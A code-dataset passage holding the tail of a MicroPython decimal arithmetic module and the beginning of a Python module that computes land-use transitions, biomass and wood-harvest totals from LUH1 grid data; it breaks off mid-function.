n._num_decimals = (\n (self._num_decimals + additional_decimals) // 2) + DecimalNumber.get_scale()\n n._reduce_to_scale()\n return n\n\n def __add__(self, other: \"DecimalNumber\") -> \"DecimalNumber\":\n \"\"\"Adds two DecimalNumber.\n Returns (self + other)\n \"\"\"\n if isinstance(other, int):\n other = DecimalNumber(other)\n\n # 123 + 456 : 123\n # : 456\n # : 579\n # 123 + 4.56 : 123 0\n # : 4 56\n # : 127 56 --> 127 + Apply 2 decimals to 56 --> 0.56\n # 123 + 0.0456 : 123 0\n # : 0 456\n # : 123 456 --> 123 + Apply 4 decimals to 456 --> 0.0456\n # 123.723 + 4.56 : 123 723\n # : 4 560 --> Apply 3 decimals to 56 --> 560\n # : 127 1283 --> 127 + Apply 3 decimals to 1283 --> 0.283 --> Add 1 to 127 --> 128\n # 0.0123 + 0.56 : 0 123\n # : 0 56 --> Apply 4 decimals to 56 --> 5600\n # : 0 5723 --> 123 + 5600\n\n max_decimals: int = max(self._num_decimals, other._num_decimals)\n\n a_factor: int = 10 ** self._num_decimals\n b_factor: int = 10 ** other._num_decimals\n\n a_integer: int = self._number // a_factor\n a_decimals: int = self._number % a_factor\n b_integer: int = other._number // b_factor\n b_decimals: int = other._number % b_factor\n\n if self._num_decimals < max_decimals:\n a_decimals *= (10 ** (max_decimals - self._num_decimals))\n\n if other._num_decimals < max_decimals:\n b_decimals *= (10 ** (max_decimals - other._num_decimals))\n\n c_factor: int = max(a_factor, b_factor)\n a_all: int = a_integer * c_factor + a_decimals\n b_all: int = b_integer * c_factor + b_decimals\n\n c_all: int = (a_all if self._is_positive else -a_all) + (b_all if other._is_positive else -b_all)\n c_is_positive: bool = (c_all > 0)\n if c_all < 0:\n c_all = -c_all\n\n new_number = DecimalNumber(c_all, max_decimals)\n new_number._is_positive = c_is_positive\n\n new_number._reduce_to_scale()\n\n return new_number\n\n def __iadd__(self, other: \"DecimalNumber\") -> \"DecimalNumber\":\n \"\"\"Adds a DecimalNumber to itself.\n Returns (self += other)\n \"\"\"\n n = self.__add__(other)\n self._number = n._number\n self._num_decimals = n._num_decimals\n self._is_positive = n._is_positive\n return self\n\n def __radd__(self, other: int) -> \"DecimalNumber\":\n \"\"\"Reverse add.\n It is called for (integer + DecimalNumber).\n At this moment, micropython does not support it.\n \"\"\"\n return self.__add__(DecimalNumber(other))\n\n def __sub__(self, other: \"DecimalNumber\") -> \"DecimalNumber\":\n if isinstance(other, int):\n other = DecimalNumber(other)\n s = other.clone()\n s._is_positive = not s._is_positive\n return self.__add__(s)\n\n def __isub__(self, other: \"DecimalNumber\") -> \"DecimalNumber\":\n n = self.__sub__(other)\n self._number = n._number\n self._num_decimals = n._num_decimals\n self._is_positive = n._is_positive\n return self\n\n def __rsub__(self, other: int) -> \"DecimalNumber\":\n return DecimalNumber(other).__sub__(self)\n\n def __mul__(self, other: \"DecimalNumber\") -> \"DecimalNumber\":\n if isinstance(other, int):\n other = DecimalNumber(other)\n a_integer: int = self._number if self._is_positive else -self._number\n b_integer: int = other._number if other._is_positive else -other._number\n c_integer: int = a_integer * b_integer\n new_number = DecimalNumber(\n c_integer, self._num_decimals + other._num_decimals)\n return new_number\n\n def __imul__(self, other: \"DecimalNumber\") -> \"DecimalNumber\":\n n = self.__mul__(other)\n self._number = n._number\n self._num_decimals = n._num_decimals\n self._is_positive = n._is_positive\n return self\n\n def __rmul__(self, other: int) -> \"DecimalNumber\":\n return self.__mul__(DecimalNumber(other))\n\n def __truediv__(self, other: \"DecimalNumber\") -> \"DecimalNumber\":\n if isinstance(other, int):\n other = DecimalNumber(other)\n # a_integer: int = self._number if self._is_positive else -self._number\n # b_integer: int = other._number if other._is_positive else -other._number\n a_integer: int\n b_integer: int\n a_integer, b_integer = DecimalNumber._make_integer_comparable(self, other)\n if b_integer != 0:\n c_factor: int = 10 ** (DecimalNumber.get_scale() + 2)\n c_integer: int = (a_integer * c_factor) // b_integer\n new_number = DecimalNumber(\n c_integer, (DecimalNumber.get_scale() + 2))\n else:\n raise DecimalNumberExceptionDivisionByZeroError(\"Division by zero\")\n return new_number\n\n def __itruediv__(self, other: \"DecimalNumber\") -> \"DecimalNumber\":\n n = self.__truediv__(other)\n self._number = n._number\n self._num_decimals = n._num_decimals\n self._is_positive = n._is_positive\n return self\n\n def __rtruediv__(self, other: int) -> \"DecimalNumber\":\n return DecimalNumber(other).__truediv__(self)\n\n def __pow__(self, other: int) -> \"DecimalNumber\":\n # Exponentition by squaring: https://en.wikipedia.org/wiki/Exponentiation_by_squaring\n e: int = other\n x = self.clone()\n x._is_positive = True\n if other == 0:\n return DecimalNumber(1)\n scale: int = DecimalNumber.get_scale()\n \n # Calculating the necessary extra scale:\n extra = abs(other) * (len(str(self._number)) - self._num_decimals)\n # extra digits for intermediate steps\n DecimalNumber.set_scale(scale + extra)\n if other < 0:\n x = DecimalNumber(1) / x\n other = -other\n y = DecimalNumber(1)\n while other > 1:\n if (other % 2) == 0:\n x *= x\n other //= 2\n else:\n y *= x\n x *= x\n other = (other - 1) // 2\n x *= y\n DecimalNumber.set_scale(scale)\n if not self._is_positive and (e % 2) == 1:\n return -x\n else:\n return +x\n\n def __neg__(self) -> \"DecimalNumber\":\n n = self.clone()\n n._is_positive = not self._is_positive\n n._reduce_to_scale()\n return n\n\n def __pos__(self) -> \"DecimalNumber\":\n n = self.clone()\n n._reduce_to_scale()\n return n\n\n def __abs__(self) -> \"DecimalNumber\":\n n = self.clone()\n n._is_positive = True\n n._reduce_to_scale()\n return n\n\n def __lt__(self, other: \"DecimalNumber\") -> bool: # Less than\n if isinstance(other, int):\n other = DecimalNumber(other)\n n1, n2 = DecimalNumber._make_integer_comparable(self, other)\n return (n1 < n2)\n\n def __le__(self, other: \"DecimalNumber\") -> bool: # Less than or equal to\n if isinstance(other, int):\n other = DecimalNumber(other)\n n1, n2 = DecimalNumber._make_integer_comparable(self, other)\n return (n1 <= n2)\n\n def __eq__(self, other: \"DecimalNumber\") -> bool: # Equal to\n if isinstance(other, int):\n other = DecimalNumber(other)\n n1, n2 = DecimalNumber._make_integer_comparable(self, other)\n return (n1 == n2)\n\n def __ne__(self, other: \"DecimalNumber\") -> bool: # Not equal to\n if isinstance(other, int):\n other = DecimalNumber(other)\n n1, n2 = DecimalNumber._make_integer_comparable(self, other)\n return (n1 != n2)\n\n def __gt__(self, other: \"DecimalNumber\") -> bool: # Greater than\n if isinstance(other, int):\n other = DecimalNumber(other)\n n1, n2 = DecimalNumber._make_integer_comparable(self, other)\n return (n1 > n2)\n\n def __ge__(self, other: \"DecimalNumber\") -> bool: # Greater than or equal to\n if isinstance(other, int):\n other = DecimalNumber(other)\n n1, n2 = DecimalNumber._make_integer_comparable(self, other)\n return (n1 >= n2)\n\n def __str__(self, thousands: bool = False) -> str:\n # Integer / Decimals: String\n # 12345 / 0: 12345\n # 12345 / 1: 1234.5\n # 12345 / 2: 123.45\n # 12345 / 3: 12.345\n # 12345 / 4: 1.2345\n # 12345 / 5: 0.12345\n # 12345 / 6: 0.012345\n # 12345 / 7: 0.0012345\n # 12345 / 8: 0.00012345\n str_number: str = str(\n self._number) if self._number >= 0 else str(-self._number)\n if self._num_decimals != 0:\n num_digits: int = len(str_number)\n if self._num_decimals < num_digits:\n str_number = str_number[:(\n num_digits - self._num_decimals)] + \".\" + str_number[-self._num_decimals:]\n else:\n str_number = \"0\" + \".\" + \\\n (\"0\" * (self._num_decimals - num_digits)) + str_number\n\n if thousands:\n pos_decimal: int = str_number.find(\".\")\n if pos_decimal == -1:\n first_part: str = str_number\n second_part: str = \"\"\n else:\n first_part: str = str_number[:pos_decimal]\n second_part: str = str_number[pos_decimal + 1:]\n first_part = \"{:,d}\".format(int(first_part))\n ##### Commenting this part to not separate decimals ###############################\n # if len(second_part) > 0:\n # # Note: reversing with second_part[::-1] is not available for micropython\n # second_part = \"{:,d}\".format(int( ''.join(reversed(second_part)) ))\n # second_part = ''.join(reversed(second_part))\n ###################################################################################\n str_number = first_part\n if len(second_part) > 0:\n str_number += \".\" + second_part\n\n str_number = str_number.replace(\".\", \"#\")\n str_number = str_number.replace(\",\", DecimalNumber.THOUSANDS_SEP)\n str_number = str_number.replace(\"#\", DecimalNumber.DECIMAL_SEP)\n\n if not self._is_positive:\n str_number = \"-\" + str_number\n\n return str_number\n\n def __repr__(self) -> str:\n return 'DecimalNumber(\"' + str(self) + '\")'\n\n def to_int_truncate(self) -> int:\n return self._number // (10 ** self._num_decimals)\n\n def to_int_round(self) -> int:\n n = self.clone()\n s = DecimalNumber.get_scale()\n DecimalNumber.set_scale(0)\n n._reduce_to_scale()\n DecimalNumber.set_scale(s)\n return n._number\n\n def to_string_thousands(self) -> str:\n return self.__str__(True)\n\n # Returns a string representing the number limited to N characters, including '.', '-' and, optionally thousands.\n # It is useful to limit the number to the length of a calculator's LCD display, for example.\n # If the number does not fit, it returns \"Overflow\".\n def to_string_max_length(self, max_length: int, thousands: bool = False) -> None:\n if max_length < 8:\n max_length = 8\n\n str_number: str = self.__str__(thousands)\n # 1,234,567,890.1234567\n # If the number of characters before '.' is greater than max_length --> Overflow\n pos_point: int = str_number.find('.')\n if pos_point == -1: # No decimals\n pos_point = len(str_number)\n if pos_point > max_length:\n return \"Overflow\"\n else:\n str_number = str_number[:max_length]\n # If there are decimals, we can eliminate trailing zeros\n pos_point: int = str_number.find('.')\n if pos_point != -1:\n # 123.34000\n while str_number[-1:] == '0':\n str_number = str_number[:-1]\n # If the last character is a point, it can be deleted\n if str_number[-1:] == '.':\n str_number = str_number[:-1]\n if str_number == \"-0\":\n str_number = \"0\"\n return str_number\n\n def _eliminate_decimal_trailing_zeros(self) -> None:\n while self._num_decimals > 0 and (self._number % 10) == 0:\n self._number //= 10\n self._num_decimals -= 1\n\n def _reduce_to_scale(self) -> None:\n if self._num_decimals > DecimalNumber.get_scale():\n # Round half to even: https://en.wikipedia.org/wiki/Rounding#Round_half_to_even\n\n # Example:\n # scale = 3\n # Number: 123.456789\n # n = 123456789, decimals = 6\n # It should be 123.457 ; n = 123457, decimals = scale = 3\n\n n: int = self._number\n s: int = self._num_decimals - DecimalNumber.get_scale() # s: 6 - 3 = 3\n ds: int = (10 ** s)\n\n v: int = n % (ds * 10) # v: n % 10**4 = 6789 1000\n b: int = v % ds # b: v % 10**3 = 789\n a: int = v // ds # a: v // 10**3 = 6\n m: int = ds // 2 # m: 10**3 // 2 = 500 (to be compared to b)\n\n if (a % 2) == 1: # Calculating differences to get to the nearest even\n if b < m:\n x: int = -b\n else:\n x: int = ds - b\n else:\n if b <= m:\n x: int = -b\n else:\n x: int = ds - b\n\n self._number = (n + x) // ds\n self._num_decimals = DecimalNumber.get_scale()\n\n self._eliminate_decimal_trailing_zeros()\n\n if self._number == 0 and not self._is_positive: # Prevents -0\n self._is_positive = True\n\n\nclass DecimalNumberException(Exception):\n pass\n\n\nclass DecimalNumberExceptionParseError(DecimalNumberException):\n def __init__(self, *args: object) -> None:\n if args:\n self.message = args[0]\n else:\n self.message = None\n\n def __str__(self) -> str:\n if self.message:\n return \"DecimalNumberExceptionParseError: {0}\".format(self.message)\n else:\n return \"DecimalNumberExceptionParseError\"\n\n\nclass DecimalNumberExceptionBadInit(DecimalNumberException):\n def __init__(self, *args: object) -> None:\n if args:\n self.message = args[0]\n else:\n self.message = None\n\n def __str__(self) -> str:\n if self.message:\n return \"DecimalNumberExceptionBadInit: {0}\".format(self.message)\n else:\n return \"DecimalNumberExceptionBadInit\"\n\n\nclass DecimalNumberExceptionMathDomainError(DecimalNumberException):\n def __init__(self, *args: object) -> None:\n if args:\n self.message = args[0]\n else:\n self.message = None\n\n def __str__(self) -> str:\n if self.message:\n return \"DecimalNumberExceptionMathDomainError: {0}\".format(self.message)\n else:\n return \"DecimalNumberExceptionMathDomainError\"\n\n\nclass DecimalNumberExceptionDivisionByZeroError(DecimalNumberException):\n def __init__(self, *args: object) -> None:\n if args:\n self.message = args[0]\n else:\n self.message = None\n\n def __str__(self) -> str:\n if self.message:\n return \"DecimalNumberExceptionDivisionByZeroError: {0}\".format(self.message)\n else:\n return \"DecimalNumberExceptionDivisionByZeroError\"\n\n\nif __name__ == \"__main__\":\n print(\"DecimalNumber module -\", DecimalNumber.VERSION)\n","sub_path":"mpy_decimal/mpy_decimal.py","file_name":"mpy_decimal.py","file_ext":"py","file_size_in_byte":38666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"585520985","text":"import logging\nimport os\nimport pdb\n\nfrom enum import Enum\nfrom tqdm import tqdm\nimport numpy as np\nimport pandas as pd\n\nimport constants\nimport pygeoutil.util as util\n\n\nRES_LUH1 = 0.5\n\nclass LU(Enum):\n \"\"\"\n Land-use types (main).\n \"\"\"\n __order__ = 'gothr gsecd gurbn gcrop gpast gssma gssmb gvbh1 gvbh2 gsbh1 gsbh2 gsbh3 all'\n gothr, gsecd, gurbn, gcrop, gpast, gssma, gssmb, gvbh1, gvbh2, gsbh1, gsbh2, gsbh3, all = range(13)\n\n\ndef add_to_list(arr, start_yr, end_yr):\n \"\"\"\n\n Args:\n arr:\n start_yr:\n end_yr:\n\n Returns:\n\n \"\"\"\n # TODO: Make more robust, years hard coded in right now\n new_arr = []\n for yr in range(850, start_yr):\n new_arr.extend([np.nan])\n\n new_arr.extend(arr)\n\n for yr in range(end_yr, 2015):\n new_arr.extend([np.nan])\n\n return new_arr\n\n\ndef get_lu_array(lu_type, year, name_LUH1='LUHa_u2.v1', subset_arr=None):\n \"\"\"\n Get array of LU category\n :param lu_type:\n :param year:\n :param subset_arr:\n :return:\n \"\"\"\n try:\n arr = util.open_or_die(constants.input_dir + os.sep + '/LUH/' + name_LUH1 + '/updated_states/' + lu_type.name + '.'\n + str(int(year)) + '.txt', skiprows=6)\n\n arr_subset = util.extract_from_ascii(arr, res=RES_LUH1, subset_arr=subset_arr)\n except:\n arr_subset = np.nan\n\n return arr_subset\n\n\ndef get_lu_area(lu_type, year, subset_arr=None):\n \"\"\"\n\n Args:\n lu_type:\n year:\n subset_arr:\n\n Returns:\n\n \"\"\"\n carea = util.open_or_die(constants.CELL_AREA_H)\n\n return np.ma.sum(get_lu_array(lu_type, year, subset_arr=subset_arr) * carea)\n\n\ndef get_lu_area_ts(lu_type, years, name_LUH1='LUHa_u2.v1', subset_arr=None):\n \"\"\"\n Get land use area for a land use state for user specified years\n Args:\n lu_type:\n years:\n subset_arr:\n\n Returns:\n a list of areas\n \"\"\"\n carea = util.open_or_die(constants.CELL_AREA_H)\n areas_lu = []\n\n for year in years:\n areas_lu.append(np.ma.sum(get_lu_array(lu_type, year, name_LUH1=name_LUH1, subset_arr=subset_arr) * carea))\n\n return areas_lu\n\n\ndef return_transition_name(name_state):\n \"\"\"\n E.g. return 'c' for state 'crop'\n Args:\n name_state:\n\n Returns:\n\n \"\"\"\n if name_state == 'crop':\n return 'c'\n elif name_state == 'pasture':\n return 'p'\n elif name_state == 'urban':\n return 'u'\n elif name_state == 'secondary':\n return 's'\n elif name_state == 'primary':\n return 'v'\n else:\n print('State: ' + name_state + ' does not exist')\n\n\ndef get_name_state_from_LUH1_enum(name_LUH1_state):\n \"\"\"\n Return english name based on LUH1 enum name\n Args:\n name_LUH1_state:\n\n Returns:\n\n \"\"\"\n if name_LUH1_state == LU.gcrop:\n return 'crop'\n elif name_LUH1_state == LU.gpast:\n return 'pasture'\n elif name_LUH1_state == LU.gurbn:\n return 'urban'\n elif name_LUH1_state == LU.gsecd:\n return 'secondary'\n elif name_LUH1_state == LU.gothr:\n return 'primary'\n else:\n print('State: ' + name_LUH1_state + ' does not exist')\n\n\ndef get_transition(source, target, year, name_LUH1='LUHa_u2.v1', subset_arr=None):\n \"\"\"\n Add up all transitions between source and target for given year\n Args:\n source:\n target:\n year:\n subset_arr:\n\n Returns:\n\n \"\"\"\n src_lus = return_transition_name(source)\n tgt_lus = return_transition_name(target)\n\n # Return np.nan if either source == target or target == primary\n if source == target or target == 'primary':\n return np.nan\n\n arr = util.open_or_die(constants.input_dir + os.sep + '/LUH/' + name_LUH1 + '/updated_states/gfl' + src_lus +\n tgt_lus + '.' + str(year) + '.txt', skiprows=6)\n\n arr_trans = util.extract_from_ascii(arr, res=RES_LUH1, subset_arr=subset_arr)\n\n return arr_trans\n\n\ndef get_transitions_into_state(source, year, name_LUH1='LUHa_u2.v1', subset_arr=None):\n \"\"\"\n Sum up all transitions INTO source\n Args:\n source:\n year:\n name_LUH1:\n subset_arr:\n\n Returns:\n\n \"\"\"\n list_targets = ['crop', 'pasture', 'urban', 'secondary', 'primary']\n arr_trans = np.zeros_like(constants.CELL_AREA_H)\n\n for tgt in list_targets:\n arr_trans = arr_trans + get_transition(tgt, source, year, name_LUH1, subset_arr)\n\n return arr_trans\n\n\ndef get_transitions_from_state(source, year, name_LUH1='LUHa_u2.v1', subset_arr=None):\n \"\"\"\n Sum up all transitions OUT of source\n Args:\n source:\n year:\n name_LUH1:\n subset_arr:\n\n Returns:\n\n \"\"\"\n list_targets = ['crop', 'pasture', 'urban', 'secondary']\n arr_trans = np.zeros_like(constants.CELL_AREA_H)\n\n for tgt in list_targets:\n arr_trans = arr_trans + get_transition(source, tgt, year, name_LUH1, subset_arr)\n\n return arr_trans\n\n\ndef wood_clearing_for_ag(years, subset_arr=None):\n \"\"\"\n For each grid-cell this is the sum of transitions from primary to cropland and pasture, multiplied by the cell\n area and the potential biomass density PLUS the sum of transitions from secondary to cropland and pasture,\n multiplied by the cell area and secondary mean biomass density. To get a global total, sum over all grid-cells.\n Args:\n years:\n subset_arr:\n\n Returns:\n\n \"\"\"\n carea = util.open_or_die(constants.CELL_AREA_H)\n\n halfdeg = util.open_or_die(constants.input_dir + os.sep +\n '/public_inputs/other/miami_biomass_v3/miami_halfdeg_conform.txt')\n\n vba = halfdeg * 0.75 # Get above ground biomass\n vba = vba * (vba > 0.01) + (vba < 0.01) * 0.01 # Set least value of vba to 0.01\n\n fnf = np.copy(vba)\n fnf[fnf < 2.0] = 0.0 # Biomass defn of forest: > 2.0 kg C/m^2\n fnf[fnf > 0.0] = 1.0\n\n sum_wc_ag = 0.0\n wc_ag = []\n for yr in tqdm(years, desc='LUH1_wood_clearing_for_ag', disable=(len(years) < 2)):\n # 2d array showing area of land transitioning from primary land to pasture and cropland\n primary_to_pasture = get_transition('primary', 'pasture', year=yr, subset_arr=subset_arr)\n primary_to_cropland = get_transition('primary', 'crop', year=yr, subset_arr=subset_arr)\n\n # 2d array showing area of land transitioning from secondary land to pasture and cropland\n scnd_to_pasture = get_transition('secondary', 'pasture', year=yr, subset_arr=subset_arr)\n scnd_to_cropland = get_transition('secondary', 'crop', year=yr, subset_arr=subset_arr)\n\n val = np.ma.sum(((primary_to_pasture + primary_to_cropland) * vba +\n (scnd_to_pasture + scnd_to_cropland) * get_lu_array(LU.gssmb, year=yr,\n subset_arr=subset_arr)) * fnf * carea)\n\n sum_wc_ag += val\n wc_ag.extend([val])\n\n return sum_wc_ag, wc_ag\n\n\ndef compute_wh(years, subset_arr=None):\n \"\"\"\n Compute wood harvesting (sum of wood harvest biomass (Pg C) and time-series of wood-harvest biomass)\n Args:\n years:\n subset_arr:\n\n Returns:\n sum of wood harvest biomass (Pg C) and time-series of wood-harvest biomass\n\n \"\"\"\n ts_wh = []\n for yr in years:\n # wood harvest biomass from primary forest\n primf_bioh = get_lu_array(LU.gvbh1, year=yr, subset_arr=subset_arr)\n\n # wood harvest biomass from primary non-forest\n primn_bioh = get_lu_array(LU.gvbh2, year=yr, subset_arr=subset_arr)\n\n # wood harvest biomass from secondary mature forest\n secmf_bioh = get_lu_array(LU.gsbh1, year=yr, subset_arr=subset_arr)\n\n # wood harvest biomass from secondary young forest\n secyf_bioh = get_lu_array(LU.gsbh2, year=yr, subset_arr=subset_arr)\n\n # wood harvest biomass from secondary non-forest\n secnf_bioh = get_lu_array(LU.gsbh3, year=yr, subset_arr=subset_arr)\n\n val = np.ma.sum(primf_bioh + primn_bioh + secmf_bioh + secnf_bioh + secyf_bioh) * constants.KG_TO_PG\n\n ts_wh.extend([val])\n\n return ts_wh\n\n\ndef human_impact_land(years, subset_arr=None):\n \"\"\"\n\n :param years:\n :param subset_arr:\n :return:\n \"\"\"\n\n area_global = 0.0\n area_impacted_human = 0.0\n\n for yr in years:\n # Get the ascii array\n othr = get_lu_array(LU.gothr, year=yr, subset_arr=subset_arr)\n secd = get_lu_array(LU.gsecd, year=yr, subset_arr=subset_arr)\n urbn = get_lu_array(LU.gurbn, year=yr, subset_arr=subset_arr)\n past = get_lu_array(LU.gpast, year=yr, subset_arr=subset_arr)\n crop = get_lu_array(LU.gcrop, year=yr, subset_arr=subset_arr)\n\n area_global += np.ma.sum(othr + secd + urbn + past + crop)\n\n area_impacted_human += np.ma.sum(crop + past + secd + urbn)\n\n return (area_impacted_human * 100.0) / area_global\n\n\ndef get_glm_scnd_area(yr, subset_arr=None):\n \"\"\"\n\n Args:\n yr:\n subset_arr:\n\n Returns:\n\n \"\"\"\n carea = util.open_or_die(constants.CELL_AREA_H)\n\n halfdeg = util.open_or_die(constants.input_dir + os.sep +\n '/public_inputs/other/miami_biomass_v3/miami_halfdeg_conform.txt')\n\n vba = halfdeg * 0.75 # Get above ground biomass\n vba = vba * (vba > 0.01) + (vba < 0.01) * 0.01 # Set least value of vba to 0.01\n\n fnf = np.copy(vba)\n fnf[fnf < 2.0] = 0.0 # Biomass defn of forest: > 2.0 kg C/m^2\n fnf[fnf > 0.0] = 1.0\n\n # Get the ascii array\n secd = get_lu_array(LU.gsecd, year=yr, subset_arr=subset_arr)\n\n scnd_area = np.ma.sum(secd * carea)\n scnd_frst_area = np.ma.sum(secd * fnf * carea)\n scnd_non_frst_area = scnd_area - scnd_frst_area\n\n return scnd_area, scnd_frst_area, scnd_non_frst_area\n\n\ndef get_glm_forest_area(yr, subset_arr=None):\n \"\"\"\n Return forest area (secd + othr) for given year\n :param yr:\n :param subset_arr:\n :return:\n \"\"\"\n carea = util.open_or_die(constants.CELL_AREA_H)\n\n halfdeg = util.open_or_die(constants.input_dir + os.sep +\n '/public_inputs/other/miami_biomass_v3/miami_halfdeg_conform.txt')\n\n vba = halfdeg * 0.75 # Get above ground biomass\n vba = vba * (vba > 0.01) + (vba < 0.01) * 0.01 # Set least value of vba to 0.01\n\n fnf = np.copy(vba)\n fnf[fnf < 2.0] = 0.0 # Biomass defn of forest: > 2.0 kg C/m^2\n fnf[fnf > 0.0] = 1.0\n\n # Get the ascii array\n othr = get_lu_array(LU.gothr, year=yr, subset_arr=subset_arr)\n secd = get_lu_array(LU.gsecd, year=yr, subset_arr=subset_arr)\n\n # forest area\n return np.ma.sum((secd + othr) * carea * fnf)\n\n\ndef ag_land_in_sc_LUH1(years, subset_arr=None):\n \"\"\"\n\n :param years:\n :param subset_arr:\n :return:\n \"\"\"\n area_ag_to_sc = 0.0\n\n # Butler map is constant throughout time\n carea = util.open_or_die(constants.CELL_AREA_H)\n\n # Get ascii file corresponding to Butler map and convert to correct resolution i.e from quarter deg to half deg\n arr_sc = util.open_or_die(constants.ASC_HALF_DEG_BUTLER)\n\n for yr in years:\n # Get ascii file corresponding to crop and subset if needed\n past = get_lu_array(LU.gpast, year=yr, subset_arr=subset_arr)\n crop = get_lu_array(LU.gcrop, year=yr, subset_arr=subset_arr)\n\n area_ag_to_sc += np.ma.sum(arr_sc * (crop + past) * carea)\n\n return area_ag_to_sc/15.0\n\n\ndef per_scnd_increase_forest(init_year=1700, end_yr=2000, subset_arr=None):\n \"\"\"\n % of secondary land increase that is forested (1700 - 2000)\n Args:\n init_year:\n end_yr:\n subset_arr:\n\n Returns:\n\n \"\"\"\n carea = util.open_or_die(constants.CELL_AREA_H)\n halfdeg = util.open_or_die(constants.input_dir + os.sep +\n '/public_inputs/other/miami_biomass_v3/miami_halfdeg_conform.txt')\n\n vba = halfdeg * 0.75 # Get above ground biomass\n vba = vba * (vba > 0.01) + (vba < 0.01) * 0.01 # Set least value of vba to 0.01\n\n fnf = np.copy(vba)\n fnf[fnf < 2.0] = 0.0 # Biomass defn of forest: > 2.0 kg C/m^2\n fnf[fnf > 0.0] = 1.0\n\n forested_scnd_end = np.ma.sum(get_lu_array(LU.gsecd, year=end_yr, subset_arr=subset_arr) * carea * fnf)\n forested_scnd_init = np.ma.sum(get_lu_array(LU.gsecd, year=init_year, subset_arr=subset_arr) * carea * fnf)\n\n scnd_end = get_lu_area(LU.gsecd, end_yr, subset_arr=subset_arr)\n scnd_init = get_lu_area(LU.gsecd, init_year, subset_arr=subset_arr)\n\n per_increase_forested_scnd = (forested_scnd_end - forested_scnd_init) * 100. / (scnd_end - scnd_init)\n\n return per_increase_forested_scnd\n\n\ndef get_MLU_LUH1_agb(subset_arr=None, do_forest=True):\n \"\"\"\n Returns potential AGB on FOREST areas\n Args:\n subset_arr:\n do_forest:\n\n Returns:\n\n \"\"\"\n carea = util.open_or_die(constants.CELL_AREA_H)\n\n halfdeg = util.open_or_die(constants.input_dir + os.sep +\n '/public_inputs/other/miami_biomass_v3/miami_halfdeg_conform.txt')\n\n vba = halfdeg * 0.75 # Get above ground biomass\n vba = vba * (vba > 0.01) + (vba < 0.01) * 0.01 # Set least value of vba to 0.01\n\n if do_forest:\n fnf = np.copy(vba)\n fnf[fnf < 2.0] = 0.0 # Biomass defn of forest: > 2.0 kg C/m^2\n fnf[fnf > 0.0] = 1.0\n else:\n fnf = 1.0\n\n if subset_arr is not None:\n return np.ma.sum(vba * carea * fnf * subset_arr)\n else:\n return np.ma.sum(vba * carea * fnf)\n\n\ndef get_LUH1_biomass(years, only_forest=True, ulat=90.0, llat=-90.0, llon=-180.0, rlon=180.0, name_LUH1='LUHa_u2.v1',\n subset_arr=None):\n \"\"\"\n\n Args:\n years:\n only_forest:\n ulat:\n llat:\n llon:\n rlon:\n subset_arr:\n\n Returns:\n\n \"\"\"\n carea = util.open_or_die(constants.CELL_AREA_H)\n if subset_arr:\n carea = carea * subset_arr\n \n halfdeg = util.open_or_die(constants.input_dir + os.sep +\n '/public_inputs/other/miami_biomass_v3/miami_halfdeg_conform.txt')\n\n vba = halfdeg * 0.75 # Get above ground biomass\n vba = vba*(vba > 0.01) + (vba < 0.01)*0.01 # Set least value of vba to 0.01\n\n fnf = np.copy(vba)\n fnf[fnf < 2.0] = 0.0 # Biomass defn of forest: > 2.0 kg C/m^2\n fnf[fnf > 0.0] = 1.0\n\n sum_biom = 0.0\n # Spatially subset carea, fnf and vba\n carea = util.extract_from_ascii(carea, ulat=ulat, llat=llat, llon=llon, rlon=rlon, res=RES_LUH1,\n subset_arr=subset_arr)\n vba = util.extract_from_ascii(vba, ulat=ulat, llat=llat, llon=llon, rlon=rlon, res=RES_LUH1, subset_arr=subset_arr)\n fnf = util.extract_from_ascii(fnf, ulat=ulat, llat=llat, llon=llon, rlon=rlon, res=RES_LUH1, subset_arr=subset_arr)\n\n for yr in years:\n # Get the ascii array\n arr_ssmb = util.open_or_die(constants.input_dir + os.sep + '/LUH/' + name_LUH1 + '/updated_states/gssmb.' +\n str(yr) + '.txt', skiprows=6)\n arr_othr = util.open_or_die(constants.input_dir + os.sep + '/LUH/' + name_LUH1 + '/updated_states/gothr.' +\n str(yr) + '.txt', skiprows=6)\n arr_secd = util.open_or_die(constants.input_dir + os.sep + '/LUH/' + name_LUH1 + '/updated_states/gsecd.' +\n str(yr) + '.txt', skiprows=6)\n # Subset by lat lon boundary\n ssmb = util.extract_from_ascii(arr_ssmb, ulat=ulat, llat=llat, llon=llon, rlon=rlon, res=RES_LUH1,\n subset_arr=subset_arr)\n othr = util.extract_from_ascii(arr_othr, ulat=ulat, llat=llat, llon=llon, rlon=rlon, res=RES_LUH1,\n subset_arr=subset_arr)\n secd = util.extract_from_ascii(arr_secd, ulat=ulat, llat=llat, llon=llon, rlon=rlon, res=RES_LUH1,\n subset_arr=subset_arr)\n\n # Secondary biomass = secondary * cell_area * secondary biomass density\n if not only_forest:\n secdf_biom = np.ma.sum(secd * carea * ssmb)\n else:\n secdf_biom = np.ma.sum(secd * carea * fnf * ssmb)\n\n # Primary biomass = primary * cell_area * primary biomass density\n if not only_forest:\n primf_biom = np.ma.sum(othr * carea * vba)\n else:\n primf_biom = np.ma.sum(othr * carea * fnf * vba)\n\n sum_biom += primf_biom + secdf_biom\n\n return sum_biom\n\n\ndef get_cumulative_emissions(start_yr, end_yr, ulat=90.0, llat=-90.0, llon=-180.0, rlon=180.0, name_LUH1='LUHa_u2.v1',\n subset_arr=None):\n \"\"\"\n Cumulative emissions is computed as difference between potential or near potential biomass in start_yr and\n biomass in current year (end_yr)\n It is a NET quantity, since we only take into account emissions and NOT regrowth\n Args:\n start_yr:\n end_yr:\n ulat:\n llat:\n llon:\n rlon:\n subset_arr:\n\n Returns:\n\n \"\"\"\n list_tot_biom = []\n\n carea = util.open_or_die(constants.CELL_AREA_H)\n if subset_arr:\n carea = carea * subset_arr\n\n halfdeg = util.open_or_die(constants.input_dir + os.sep +\n '/public_inputs/other/miami_biomass_v3/miami_halfdeg_conform.txt')\n\n vba = halfdeg * 0.75 # Get above ground biomass\n vba = vba * (vba > 0.01) + (vba < 0.01) * 0.01 # Set least value of vba to 0.01\n\n fnf = np.copy(vba)\n fnf[fnf < 2.0] = 0.0 # Biomass defn of forest: > 2.0 kg C/m^2\n fnf[fnf > 0.0] = 1.0\n\n # Spatially subset carea, fnf and vba\n carea = util.extract_from_ascii(carea, ulat=ulat, llat=llat, llon=llon, rlon=rlon, res=RES_LUH1,\n subset_arr=subset_arr)\n vba = util.extract_from_ascii(vba, ulat=ulat, llat=llat, llon=llon, rlon=rlon, res=RES_LUH1, subset_arr=subset_arr)\n fnf = util.extract_from_ascii(fnf, 